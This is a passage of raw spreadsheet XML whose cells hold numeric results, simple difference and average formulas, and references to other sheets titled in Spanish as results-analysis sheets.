      <c r="V279" s="422" t="s">
        <v>558</v>
      </c>
      <c r="W279" s="384">
        <f>'(D) - Análisis Resultados I - S'!GD78</f>
        <v>0.4994456763</v>
      </c>
      <c r="X279" s="385">
        <f>'(D) - Análisis Resultados III -'!FA35</f>
        <v>0.7727272727</v>
      </c>
      <c r="Y279" s="69">
        <v>0.4431818181818182</v>
      </c>
    </row>
    <row r="313">
      <c r="K313" s="576" t="s">
        <v>2803</v>
      </c>
      <c r="L313" s="221"/>
      <c r="M313" s="221"/>
      <c r="N313" s="221"/>
      <c r="O313" s="221"/>
      <c r="P313" s="221"/>
      <c r="Q313" s="222"/>
      <c r="V313" s="576" t="s">
        <v>2803</v>
      </c>
      <c r="W313" s="221"/>
      <c r="X313" s="221"/>
      <c r="Y313" s="221"/>
      <c r="Z313" s="221"/>
      <c r="AA313" s="221"/>
      <c r="AB313" s="222"/>
    </row>
    <row r="316">
      <c r="K316" s="42" t="s">
        <v>2798</v>
      </c>
      <c r="L316" s="69">
        <f>'(D) - Análisis Resultados I - S'!GA28</f>
        <v>0.0843373494</v>
      </c>
      <c r="V316" s="42" t="s">
        <v>2798</v>
      </c>
      <c r="W316" s="69">
        <f>'(D) - Análisis Resultados I - S'!GA28</f>
        <v>0.0843373494</v>
      </c>
    </row>
    <row r="317">
      <c r="K317" s="42" t="s">
        <v>2799</v>
      </c>
      <c r="L317" s="69">
        <f>'(D) - Análisis Resultados I - S'!GA29</f>
        <v>0.2804878049</v>
      </c>
      <c r="V317" s="42" t="s">
        <v>2799</v>
      </c>
      <c r="W317" s="69">
        <f>'(D) - Análisis Resultados I - S'!GA29</f>
        <v>0.2804878049</v>
      </c>
    </row>
    <row r="318">
      <c r="K318" s="42" t="s">
        <v>2800</v>
      </c>
      <c r="L318" s="69">
        <f>'(D) - Análisis Resultados I - S'!GA30</f>
        <v>0.4390243902</v>
      </c>
      <c r="V318" s="42" t="s">
        <v>2800</v>
      </c>
      <c r="W318" s="69">
        <f>'(D) - Análisis Resultados I - S'!GA30</f>
        <v>0.4390243902</v>
      </c>
    </row>
    <row r="319">
      <c r="K319" s="42" t="s">
        <v>2801</v>
      </c>
      <c r="L319" s="69">
        <f>'(D) - Análisis Resultados I - S'!GA31</f>
        <v>0.5</v>
      </c>
      <c r="V319" s="42" t="s">
        <v>2801</v>
      </c>
      <c r="W319" s="69">
        <f>'(D) - Análisis Resultados I - S'!GA31</f>
        <v>0.5</v>
      </c>
    </row>
    <row r="320">
      <c r="K320" s="42" t="s">
        <v>25</v>
      </c>
      <c r="L320" s="69">
        <f>'(D) - Análisis Resultados II - '!EX12</f>
        <v>0.7045454545</v>
      </c>
      <c r="V320" s="42" t="s">
        <v>32</v>
      </c>
      <c r="W320" s="69">
        <f>'(D) - Análisis Resultados III -'!FA12</f>
        <v>0.7045454545</v>
      </c>
    </row>
    <row r="321">
      <c r="V321" s="42" t="s">
        <v>25</v>
      </c>
      <c r="W321" s="69">
        <v>0.7045454545454546</v>
      </c>
    </row>
    <row r="351">
      <c r="K351" s="576" t="s">
        <v>2804</v>
      </c>
      <c r="L351" s="221"/>
      <c r="M351" s="221"/>
      <c r="N351" s="221"/>
      <c r="O351" s="221"/>
      <c r="P351" s="221"/>
      <c r="Q351" s="222"/>
      <c r="V351" s="576" t="s">
        <v>2804</v>
      </c>
      <c r="W351" s="221"/>
      <c r="X351" s="221"/>
      <c r="Y351" s="221"/>
      <c r="Z351" s="221"/>
      <c r="AA351" s="221"/>
      <c r="AB351" s="222"/>
    </row>
    <row r="355">
      <c r="K355" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="L355" s="13" t="s">
        <v>2801</v>
      </c>
      <c r="M355" s="887" t="s">
        <v>2732</v>
      </c>
      <c r="O355" s="42" t="s">
        <v>2805</v>
      </c>
      <c r="V355" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="W355" s="13" t="s">
        <v>2801</v>
      </c>
      <c r="X355" s="887" t="s">
        <v>2733</v>
      </c>
      <c r="Y355" s="42" t="s">
        <v>2732</v>
      </c>
      <c r="Z355" s="42" t="s">
        <v>2806</v>
      </c>
    </row>
    <row r="356">
      <c r="K356" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="L356" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE65</f>
        <v>0.5</v>
      </c>
      <c r="M356" s="69">
        <f>'(D) - Análisis Resultados II - '!EY21</f>
        <v>0.6666666667</v>
      </c>
      <c r="O356" s="69">
        <f t="shared" ref="O356:O369" si="13">M356-L356</f>
        <v>0.1666666667</v>
      </c>
      <c r="V356" s="379" t="s">
        <v>2093</v>
      </c>
      <c r="W356" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE65</f>
        <v>0.5</v>
      </c>
      <c r="X356" s="69">
        <f>'(D) - Análisis Resultados III -'!FB22</f>
        <v>0.8333333333</v>
      </c>
      <c r="Y356" s="69">
        <v>0.6666666666666666</v>
      </c>
      <c r="Z356" s="69">
        <f t="shared" ref="Z356:Z369" si="14">X356-W356</f>
        <v>0.3333333333</v>
      </c>
    </row>
    <row r="357">
      <c r="K357" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="L357" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE66</f>
        <v>0</v>
      </c>
      <c r="M357" s="69">
        <f>'(D) - Análisis Resultados II - '!EY22</f>
        <v>1</v>
      </c>
      <c r="O357" s="69">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="V357" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="W357" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE66</f>
        <v>0</v>
      </c>
      <c r="X357" s="69">
        <f>'(D) - Análisis Resultados III -'!FB23</f>
        <v>1</v>
      </c>
      <c r="Y357" s="69">
        <v>1.0</v>
      </c>
      <c r="Z357" s="69">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="358">
      <c r="K358" s="379" t="s">
        <v>951</v>
      </c>
      <c r="L358" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE67</f>
        <v>0.5</v>
      </c>
      <c r="M358" s="69">
        <f>'(D) - Análisis Resultados II - '!EY23</f>
        <v>0.9</v>
      </c>
      <c r="O358" s="69">
        <f t="shared" si="13"/>
        <v>0.4</v>
      </c>
      <c r="V358" s="379" t="s">
        <v>951</v>
      </c>
      <c r="W358" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE67</f>
        <v>0.5</v>
      </c>
      <c r="X358" s="69">
        <f>'(D) - Análisis Resultados III -'!FB24</f>
        <v>0.8</v>
      </c>
      <c r="Y358" s="69">
        <v>0.9</v>
      </c>
      <c r="Z358" s="69">
        <f t="shared" si="14"/>
        <v>0.3</v>
      </c>
    </row>
    <row r="359">
      <c r="K359" s="379" t="s">
        <v>633</v>
      </c>
      <c r="L359" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE68</f>
        <v>0.5</v>
      </c>
      <c r="M359" s="69">
        <f>'(D) - Análisis Resultados II - '!EY24</f>
        <v>1</v>
      </c>
      <c r="O359" s="69">
        <f t="shared" si="13"/>
        <v>0.5</v>
      </c>
      <c r="V359" s="379" t="s">
        <v>633</v>
      </c>
      <c r="W359" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE68</f>
        <v>0.5</v>
      </c>
      <c r="X359" s="69">
        <f>'(D) - Análisis Resultados III -'!FB25</f>
        <v>0.75</v>
      </c>
      <c r="Y359" s="69">
        <v>1.0</v>
      </c>
      <c r="Z359" s="69">
        <f t="shared" si="14"/>
        <v>0.25</v>
      </c>
    </row>
    <row r="360">
      <c r="K360" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="L360" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE69</f>
        <v>0</v>
      </c>
      <c r="M360" s="69">
        <f>'(D) - Análisis Resultados II - '!EY25</f>
        <v>1</v>
      </c>
      <c r="O360" s="69">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="V360" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="W360" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE69</f>
        <v>0</v>
      </c>
      <c r="X360" s="69">
        <f>'(D) - Análisis Resultados III -'!FB26</f>
        <v>1</v>
      </c>
      <c r="Y360" s="69">
        <v>1.0</v>
      </c>
      <c r="Z360" s="69">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="361">
      <c r="K361" s="379" t="s">
        <v>244</v>
      </c>
      <c r="L361" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE70</f>
        <v>0.5714285714</v>
      </c>
      <c r="M361" s="69">
        <f>'(D) - Análisis Resultados II - '!EY26</f>
        <v>0.7142857143</v>
      </c>
      <c r="O361" s="69">
        <f t="shared" si="13"/>
        <v>0.1428571429</v>
      </c>
      <c r="V361" s="379" t="s">
        <v>244</v>
      </c>
      <c r="W361" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE70</f>
        <v>0.5714285714</v>
      </c>
      <c r="X361" s="69">
        <f>'(D) - Análisis Resultados III -'!FB27</f>
        <v>0.7142857143</v>
      </c>
      <c r="Y361" s="69">
        <v>0.7142857142857143</v>
      </c>
      <c r="Z361" s="69">
        <f t="shared" si="14"/>
        <v>0.1428571429</v>
      </c>
    </row>
    <row r="362">
      <c r="K362" s="379" t="s">
        <v>427</v>
      </c>
      <c r="L362" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE71</f>
        <v>0.2</v>
      </c>
      <c r="M362" s="69">
        <f>'(D) - Análisis Resultados II - '!EY27</f>
        <v>0.6</v>
      </c>
      <c r="O362" s="69">
        <f t="shared" si="13"/>
        <v>0.4</v>
      </c>
      <c r="V362" s="379" t="s">
        <v>427</v>
      </c>
      <c r="W362" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE71</f>
        <v>0.2</v>
      </c>
      <c r="X362" s="69">
        <f>'(D) - Análisis Resultados III -'!FB28</f>
        <v>0.4</v>
      </c>
      <c r="Y362" s="69">
        <v>0.6</v>
      </c>
      <c r="Z362" s="69">
        <f t="shared" si="14"/>
        <v>0.2</v>
      </c>
    </row>
    <row r="363">
      <c r="K363" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="L363" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE72</f>
        <v>0.4210526316</v>
      </c>
      <c r="M363" s="69">
        <f>'(D) - Análisis Resultados II - '!EY28</f>
        <v>0.4210526316</v>
      </c>
      <c r="O363" s="69">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="V363" s="379" t="s">
        <v>1373</v>
      </c>
      <c r="W363" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE72</f>
        <v>0.4210526316</v>
      </c>
      <c r="X363" s="69">
        <f>'(D) - Análisis Resultados III -'!FB29</f>
        <v>0.5263157895</v>
      </c>
      <c r="Y363" s="69">
        <v>0.42105263157894735</v>
      </c>
      <c r="Z363" s="69">
        <f t="shared" si="14"/>
        <v>0.1052631579</v>
      </c>
    </row>
    <row r="364">
      <c r="K364" s="379" t="s">
        <v>209</v>
      </c>
      <c r="L364" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE73</f>
        <v>0.6923076923</v>
      </c>
      <c r="M364" s="69">
        <f>'(D) - Análisis Resultados II - '!EY29</f>
        <v>0.8461538462</v>
      </c>
      <c r="O364" s="69">
        <f t="shared" si="13"/>
        <v>0.1538461538</v>
      </c>
      <c r="V364" s="379" t="s">
        <v>209</v>
      </c>
      <c r="W364" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE73</f>
        <v>0.6923076923</v>
      </c>
      <c r="X364" s="69">
        <f>'(D) - Análisis Resultados III -'!FB30</f>
        <v>0.6923076923</v>
      </c>
      <c r="Y364" s="69">
        <v>0.8461538461538461</v>
      </c>
      <c r="Z364" s="69">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
    </row>
    <row r="365">
      <c r="K365" s="379" t="s">
        <v>664</v>
      </c>
      <c r="L365" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE74</f>
        <v>0.5</v>
      </c>
      <c r="M365" s="69">
        <f>'(D) - Análisis Resultados II - '!EY30</f>
        <v>0.75</v>
      </c>
      <c r="O365" s="69">
        <f t="shared" si="13"/>
        <v>0.25</v>
      </c>
      <c r="V365" s="379" t="s">
        <v>664</v>
      </c>
      <c r="W365" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE74</f>
        <v>0.5</v>
      </c>
      <c r="X365" s="69">
        <f>'(D) - Análisis Resultados III -'!FB31</f>
        <v>0.625</v>
      </c>
      <c r="Y365" s="69">
        <v>0.75</v>
      </c>
      <c r="Z365" s="69">
        <f t="shared" si="14"/>
        <v>0.125</v>
      </c>
    </row>
    <row r="366">
      <c r="K366" s="379" t="s">
        <v>357</v>
      </c>
      <c r="L366" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE75</f>
        <v>0.6</v>
      </c>
      <c r="M366" s="69">
        <f>'(D) - Análisis Resultados II - '!EY31</f>
        <v>0.8</v>
      </c>
      <c r="O366" s="69">
        <f t="shared" si="13"/>
        <v>0.2</v>
      </c>
      <c r="V366" s="379" t="s">
        <v>357</v>
      </c>
      <c r="W366" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE75</f>
        <v>0.6</v>
      </c>
      <c r="X366" s="69">
        <f>'(D) - Análisis Resultados III -'!FB32</f>
        <v>0.8</v>
      </c>
      <c r="Y366" s="69">
        <v>0.8</v>
      </c>
      <c r="Z366" s="69">
        <f t="shared" si="14"/>
        <v>0.2</v>
      </c>
    </row>
    <row r="367">
      <c r="K367" s="379" t="s">
        <v>310</v>
      </c>
      <c r="L367" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE76</f>
        <v>0.2</v>
      </c>
      <c r="M367" s="69">
        <f>'(D) - Análisis Resultados II - '!EY32</f>
        <v>0.8</v>
      </c>
      <c r="O367" s="69">
        <f t="shared" si="13"/>
        <v>0.6</v>
      </c>
      <c r="V367" s="379" t="s">
        <v>310</v>
      </c>
      <c r="W367" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE76</f>
        <v>0.2</v>
      </c>
      <c r="X367" s="69">
        <f>'(D) - Análisis Resultados III -'!FB33</f>
        <v>0.6</v>
      </c>
      <c r="Y367" s="69">
        <v>0.8</v>
      </c>
      <c r="Z367" s="69">
        <f t="shared" si="14"/>
        <v>0.4</v>
      </c>
    </row>
    <row r="368">
      <c r="K368" s="379" t="s">
        <v>292</v>
      </c>
      <c r="L368" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE77</f>
        <v>0.4</v>
      </c>
      <c r="M368" s="69">
        <f>'(D) - Análisis Resultados II - '!EY33</f>
        <v>0.6</v>
      </c>
      <c r="O368" s="69">
        <f t="shared" si="13"/>
        <v>0.2</v>
      </c>
      <c r="V368" s="379" t="s">
        <v>292</v>
      </c>
      <c r="W368" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE77</f>
        <v>0.4</v>
      </c>
      <c r="X368" s="69">
        <f>'(D) - Análisis Resultados III -'!FB34</f>
        <v>1</v>
      </c>
      <c r="Y368" s="69">
        <v>0.6</v>
      </c>
      <c r="Z368" s="69">
        <f t="shared" si="14"/>
        <v>0.6</v>
      </c>
    </row>
    <row r="369">
      <c r="K369" s="422" t="s">
        <v>558</v>
      </c>
      <c r="L369" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE78</f>
        <v>0.5</v>
      </c>
      <c r="M369" s="69">
        <f>'(D) - Análisis Resultados II - '!EY34</f>
        <v>0.75</v>
      </c>
      <c r="O369" s="69">
        <f t="shared" si="13"/>
        <v>0.25</v>
      </c>
      <c r="V369" s="422" t="s">
        <v>558</v>
      </c>
      <c r="W369" s="69">
        <f>'(D) - Análisis Resultados I - S'!GE78</f>
        <v>0.5</v>
      </c>
      <c r="X369" s="69">
        <f>'(D) - Análisis Resultados III -'!FB35</f>
        <v>1</v>
      </c>
      <c r="Y369" s="69">
        <v>0.75</v>
      </c>
      <c r="Z369" s="69">
        <f t="shared" si="14"/>
        <v>0.5</v>
      </c>
    </row>
    <row r="372">
      <c r="K372" s="42" t="s">
        <v>2807</v>
      </c>
      <c r="L372" s="69">
        <f>AVERAGE(O356:O369)</f>
        <v>0.3759549974</v>
      </c>
      <c r="V372" s="42" t="s">
        <v>2807</v>
      </c>
      <c r="W372" s="69">
        <f>AVERAGE(Z356:Z369)</f>
        <v>0.3683181167</v>
      </c>
    </row>
    <row r="410">
      <c r="K410" s="576" t="s">
        <v>2808</v>
      </c>
      <c r="L410" s="221"/>
      <c r="M410" s="221"/>
      <c r="N410" s="221"/>
      <c r="O410" s="221"/>
      <c r="P410" s="221"/>
      <c r="Q410" s="222"/>
      <c r="V410" s="576" t="s">
        <v>2808</v>
      </c>
      <c r="W410" s="221"/>
      <c r="X410" s="221"/>
      <c r="Y410" s="221"/>
      <c r="Z410" s="221"/>
      <c r="AA410" s="221"/>
      <c r="AB410" s="222"/>
    </row>
    <row r="414">
      <c r="K414" s="42" t="s">
        <v>2809</v>
      </c>
      <c r="L414" s="42" t="s">
        <v>2810</v>
      </c>
      <c r="V414" s="42" t="s">
        <v>2809</v>
      </c>
      <c r="W414" s="42" t="s">
        <v>2810</v>
      </c>
    </row>
    <row r="415">
      <c r="K415" s="42" t="s">
        <v>2798</v>
      </c>
      <c r="L415" s="69">
        <f>'(D) - Análisis Resultados I - S'!FE49</f>
        <v>0.1141879325</v>
      </c>
      <c r="V415" s="42" t="s">
        <v>2798</v>
      </c>
      <c r="W415" s="69">
        <f>'(D) - Análisis Resultados I - S'!FE49</f>
        <v>0.1141879325</v>
      </c>
    </row>
    <row r="416">
      <c r="K416" s="42" t="s">
        <v>2799</v>
      </c>
      <c r="L416" s="69">
        <f>'(D) - Análisis Resultados I - S'!FF49</f>
        <v>0.270935736</v>
      </c>
      <c r="V416" s="42" t="s">
        <v>2799</v>
      </c>
      <c r="W416" s="69">
        <f>'(D) - Análisis Resultados I - S'!FF49</f>
        <v>0.270935736</v>
      </c>
    </row>
    <row r="417">
      <c r="K417" s="42" t="s">
        <v>2800</v>
      </c>
      <c r="L417" s="69">
        <f>'(D) - Análisis Resultados I - S'!FG49</f>
        <v>0.3316818721</v>
      </c>
      <c r="V417" s="42" t="s">
        <v>2800</v>
      </c>
      <c r="W417" s="69">
        <f>'(D) - Análisis Resultados I - S'!FG49</f>
        <v>0.3316818721</v>
      </c>
    </row>
    <row r="418">
      <c r="K418" s="42" t="s">
        <v>2801</v>
      </c>
      <c r="L418" s="69">
        <f>'(D) - Análisis Resultados I - S'!FH49</f>
        <v>0.2515818474</v>
      </c>
      <c r="V418" s="42" t="s">
        <v>2801</v>
      </c>
      <c r="W418" s="69">
        <f>'(D) - Análisis Resultados I - S'!FH49</f>
        <v>0.2515818474</v>
      </c>
    </row>
    <row r="419">
      <c r="K419" s="42" t="s">
        <v>25</v>
      </c>
      <c r="L419" s="69">
        <f>'(D) - Análisis Resultados II - '!DZ22</f>
        <v>0.8393720597</v>
      </c>
      <c r="V419" s="42" t="s">
        <v>32</v>
      </c>
      <c r="W419" s="69">
        <f>'(D) - Análisis Resultados III -'!DF44</f>
        <v>0.6873139593</v>
      </c>
    </row>
    <row r="420">
      <c r="V420" s="42" t="s">
        <v>25</v>
      </c>
      <c r="W420" s="69">
        <v>0.8393720596645177</v>
      </c>
    </row>
    <row r="449">
      <c r="K449" s="576" t="s">
        <v>2811</v>
      </c>
      <c r="L449" s="221"/>
      <c r="M449" s="221"/>
      <c r="N449" s="221"/>
      <c r="O449" s="221"/>
      <c r="P449" s="221"/>
      <c r="Q449" s="222"/>
      <c r="V449" s="576" t="s">
        <v>2811</v>
      </c>
      <c r="W449" s="221"/>
      <c r="X449" s="221"/>
      <c r="Y449" s="221"/>
      <c r="Z449" s="221"/>
      <c r="AA449" s="221"/>
      <c r="AB449" s="222"/>
    </row>
    <row r="452">
      <c r="L452" s="42" t="s">
        <v>2731</v>
      </c>
      <c r="M452" s="42" t="s">
        <v>2730</v>
      </c>
      <c r="N452" s="42" t="s">
        <v>2729</v>
      </c>
      <c r="O452" s="42" t="s">
        <v>2728</v>
      </c>
      <c r="P452" s="42" t="s">
        <v>2732</v>
      </c>
      <c r="Q452" s="42" t="s">
        <v>2733</v>
      </c>
      <c r="W452" s="42" t="s">
        <v>2731</v>
      </c>
      <c r="X452" s="42" t="s">
        <v>2730</v>
      </c>
      <c r="Y452" s="42" t="s">
        <v>2729</v>
      </c>
      <c r="Z452" s="42" t="s">
        <v>2728</v>
      </c>
      <c r="AA452" s="42" t="s">
        <v>2733</v>
      </c>
      <c r="AB452" s="42" t="s">
        <v>2732</v>
      </c>
    </row>
    <row r="453">
      <c r="K453" s="42" t="s">
        <v>2812</v>
      </c>
      <c r="L453" s="69">
        <v>0.08433734939759036</v>
      </c>
      <c r="M453" s="69">
        <v>0.2804878048780488</v>
      </c>
      <c r="N453" s="69">
        <v>0.43902439024390244</v>
      </c>
      <c r="O453" s="338">
        <v>0.5</v>
      </c>
      <c r="P453" s="338">
        <v>0.7045454545454546</v>
      </c>
      <c r="Q453" s="69">
        <f>'(D) - Análisis Resultados III -'!DF42</f>
        <v>0.7045454545</v>
      </c>
      <c r="V453" s="42" t="s">
        <v>2812</v>
      </c>
      <c r="W453" s="69">
        <v>0.08433734939759036</v>
      </c>
      <c r="X453" s="69">
        <v>0.2804878048780488</v>
      </c>
      <c r="Y453" s="69">
        <v>0.43902439024390244</v>
      </c>
      <c r="Z453" s="338">
        <v>0.5</v>
      </c>
      <c r="AA453" s="69">
        <v>0.7045454545454546</v>
      </c>
      <c r="AB453" s="338">
        <v>0.7045454545454546</v>
      </c>
    </row>
    <row r="454">
      <c r="K454" s="42" t="s">
        <v>2646</v>
      </c>
      <c r="L454" s="69">
        <v>0.8453960905349794</v>
      </c>
      <c r="M454" s="69">
        <v>0.7382910353133679</v>
      </c>
      <c r="N454" s="69">
        <v>0.7494151424706981</v>
      </c>
      <c r="O454" s="69">
        <v>0.8734131481650226</v>
      </c>
      <c r="P454" s="338">
        <v>0.0</v>
      </c>
      <c r="Q454" s="69">
        <f>'(D) - Análisis Resultados III -'!DF43</f>
        <v>0.3294960948</v>
      </c>
      <c r="V454" s="42" t="s">
        <v>2646</v>
      </c>
      <c r="W454" s="69">
        <v>0.8453960905349794</v>
      </c>
      <c r="X454" s="69">
        <v>0.7382910353133679</v>
      </c>
      <c r="Y454" s="69">
        <v>0.7494151424706981</v>
      </c>
      <c r="Z454" s="69">
        <v>0.8734131481650226</v>
      </c>
      <c r="AA454" s="69">
        <v>0.32949609478341646</v>
      </c>
      <c r="AB454" s="338">
        <v>0.0</v>
      </c>
    </row>
    <row r="455">
      <c r="K455" s="42" t="s">
        <v>2813</v>
      </c>
      <c r="L455" s="69">
        <v>0.11418793250945944</v>
      </c>
      <c r="M455" s="69">
        <v>0.2709357359630882</v>
      </c>
      <c r="N455" s="69">
        <v>0.3316818721021047</v>
      </c>
      <c r="O455" s="69">
        <v>0.2515818473528818</v>
      </c>
      <c r="P455" s="69">
        <v>0.8393720596645177</v>
      </c>
      <c r="Q455" s="69">
        <f>'(D) - Análisis Resultados III -'!DF44</f>
        <v>0.6873139593</v>
      </c>
      <c r="V455" s="42" t="s">
        <v>2813</v>
      </c>
      <c r="W455" s="69">
        <v>0.11418793250945944</v>
      </c>
      <c r="X455" s="69">
        <v>0.2709357359630882</v>
      </c>
      <c r="Y455" s="69">
        <v>0.3316818721021047</v>
      </c>
      <c r="Z455" s="69">
        <v>0.2515818473528818</v>
      </c>
      <c r="AA455" s="69">
        <v>0.6873139593194075</v>
      </c>
      <c r="AB455" s="69">
        <v>0.8393720596645177</v>
      </c>
    </row>
    <row r="458">
      <c r="L458" s="42" t="s">
        <v>2814</v>
      </c>
      <c r="M458" s="42" t="s">
        <v>2815</v>
      </c>
      <c r="N458" s="42" t="s">
        <v>2810</v>
      </c>
    </row>
    <row r="459">
      <c r="K459" s="42" t="s">
        <v>2731</v>
      </c>
      <c r="L459" s="69">
        <v>0.08433734939759036</v>
      </c>
      <c r="M459" s="69">
        <v>0.8453960905349794</v>
      </c>
      <c r="N459" s="69">
        <v>0.11418793250945944</v>
      </c>
    </row>
    <row r="460">
      <c r="K460" s="42" t="s">
        <v>2730</v>
      </c>
      <c r="L460" s="69">
        <v>0.2804878048780488</v>
      </c>
      <c r="M460" s="69">
        <v>0.7382910353133679</v>
      </c>
      <c r="N460" s="69">
        <v>0.2709357359630882</v>
      </c>
    </row>
    <row r="461">
      <c r="K461" s="42" t="s">
        <v>2729</v>
      </c>
      <c r="L461" s="69">
        <v>0.43902439024390244</v>
      </c>
      <c r="M461" s="69">
        <v>0.7494151424706981</v>
      </c>
      <c r="N461" s="69">
        <v>0.3316818721021047</v>
      </c>
    </row>
    <row r="462">
      <c r="K462" s="42" t="s">
        <v>2728</v>
      </c>
      <c r="L462" s="338">
        <v>0.5</v>
      </c>
      <c r="M462" s="69">
        <v>0.8734131481650226</v>
      </c>
      <c r="N462" s="69">
        <v>0.2515818473528818</v>
      </c>
    </row>
    <row r="463">
      <c r="K463" s="42" t="s">
        <v>2732</v>
      </c>
      <c r="L463" s="338">
        <v>0.7045454545454546</v>
      </c>
      <c r="M463" s="338">
        <v>0.0</v>
      </c>
      <c r="N463" s="69">
        <v>0.8393720596645177</v>
      </c>
    </row>
    <row r="464">
      <c r="K464" s="42" t="s">
        <v>2733</v>
      </c>
      <c r="L464" s="69">
        <f>'(D) - Análisis Resultados III -'!DF42</f>
        <v>0.7045454545</v>
      </c>
      <c r="M464" s="69">
        <f>'(D) - Análisis Resultados III -'!DF43</f>
        <v>0.3294960948</v>
      </c>
      <c r="N464" s="69">
        <f>'(D) - Análisis Resultados III -'!DF44</f>
        <v>0.6873139593</v>
      </c>
    </row>
    <row r="498">
      <c r="K498" s="42" t="s">
        <v>2642</v>
      </c>
      <c r="V498" s="42" t="s">
        <v>2642</v>
      </c>
    </row>
    <row r="499">
      <c r="K499" s="42" t="s">
        <v>2448</v>
      </c>
      <c r="L499" s="42" t="s">
        <v>2728</v>
      </c>
      <c r="M499" s="42" t="s">
        <v>25</v>
      </c>
      <c r="V499" s="42" t="s">
        <v>2448</v>
      </c>
      <c r="W499" s="42" t="s">
        <v>2728</v>
      </c>
      <c r="X499" s="42" t="s">
        <v>32</v>
      </c>
      <c r="Y499" s="42" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="500">
      <c r="K500" s="42" t="s">
        <v>2093</v>
      </c>
      <c r="L500" s="888">
        <v>9.8</v>
      </c>
      <c r="M500" s="888">
        <v>2.8</v>
      </c>
      <c r="V500" s="42" t="s">
        <v>2093</v>
      </c>
      <c r="W500" s="888">
        <v>9.8</v>
      </c>
      <c r="X500" s="757">
        <v>2.0</v>
      </c>
      <c r="Y500" s="888">
        <v>2.8</v>
      </c>
    </row>
    <row r="501">
      <c r="K501" s="42" t="s">
        <v>2013</v>
      </c>
      <c r="L501" s="888" t="s">
        <v>12</v>
      </c>
      <c r="M501" s="888">
        <v>6.0</v>
      </c>
      <c r="V501" s="42" t="s">
        <v>2013</v>
      </c>
      <c r="W501" s="888">
        <v>0.0</v>
      </c>
      <c r="X501" s="757">
        <v>1.0</v>
      </c>
      <c r="Y501" s="888">
        <v>6.0</v>
      </c>
    </row>
    <row r="502">
      <c r="K502" s="42" t="s">
        <v>951</v>
      </c>
      <c r="L502" s="888">
        <v>11.75</v>
      </c>
      <c r="M502" s="888">
        <v>1.25</v>
      </c>
      <c r="V502" s="42" t="s">
        <v>951</v>
      </c>
      <c r="W502" s="888">
        <v>11.75</v>
      </c>
      <c r="X502" s="757">
        <v>3.0</v>
      </c>
      <c r="Y502" s="888">
        <v>1.25</v>
      </c>
    </row>
    <row r="503">
      <c r="K503" s="42" t="s">
        <v>633</v>
      </c>
      <c r="L503" s="888">
        <v>10.5</v>
      </c>
      <c r="M503" s="888">
        <v>1.0</v>
      </c>
      <c r="V503" s="42" t="s">
        <v>633</v>
      </c>
      <c r="W503" s="888">
        <v>10.5</v>
      </c>
      <c r="X503" s="757">
        <v>1.0</v>
      </c>
      <c r="Y503" s="888">
        <v>1.0</v>
      </c>
    </row>
    <row r="504">
      <c r="K504" s="42" t="s">
        <v>1725</v>
      </c>
      <c r="L504" s="888">
        <v>12.0</v>
      </c>
      <c r="M504" s="888">
        <v>0.0</v>
      </c>
      <c r="V504" s="42" t="s">
        <v>1725</v>
      </c>
      <c r="W504" s="888">
        <v>12.0</v>
      </c>
      <c r="X504" s="757">
        <v>0.0</v>
      </c>
      <c r="Y504" s="888">
        <v>0.0</v>
      </c>
    </row>
    <row r="505">
      <c r="K505" s="42" t="s">
        <v>244</v>
      </c>
      <c r="L505" s="888">
        <v>4.428571428571429</v>
      </c>
      <c r="M505" s="888">
        <v>0.5714285714285714</v>
      </c>
      <c r="V505" s="42" t="s">
        <v>244</v>
      </c>
      <c r="W505" s="888">
        <v>4.428571428571429</v>
      </c>
      <c r="X505" s="757">
        <v>1.0</v>
      </c>
      <c r="Y505" s="888">
        <v>0.5714285714285714</v>
      </c>
    </row>
    <row r="506">
      <c r="K506" s="42" t="s">
        <v>427</v>
      </c>
      <c r="L506" s="888">
        <v>13.5</v>
      </c>
      <c r="M506" s="888">
        <v>0.5</v>
      </c>
      <c r="V506" s="42" t="s">
        <v>427</v>
      </c>
      <c r="W506" s="888">
        <v>13.5</v>
      </c>
      <c r="X506" s="757">
        <v>0.0</v>
      </c>
      <c r="Y506" s="888">
        <v>0.5</v>
      </c>
    </row>
    <row r="507">
      <c r="K507" s="42" t="s">
        <v>1373</v>
      </c>
      <c r="L507" s="888">
        <v>4.944444444444445</v>
      </c>
      <c r="M507" s="888">
        <v>0.5</v>
      </c>
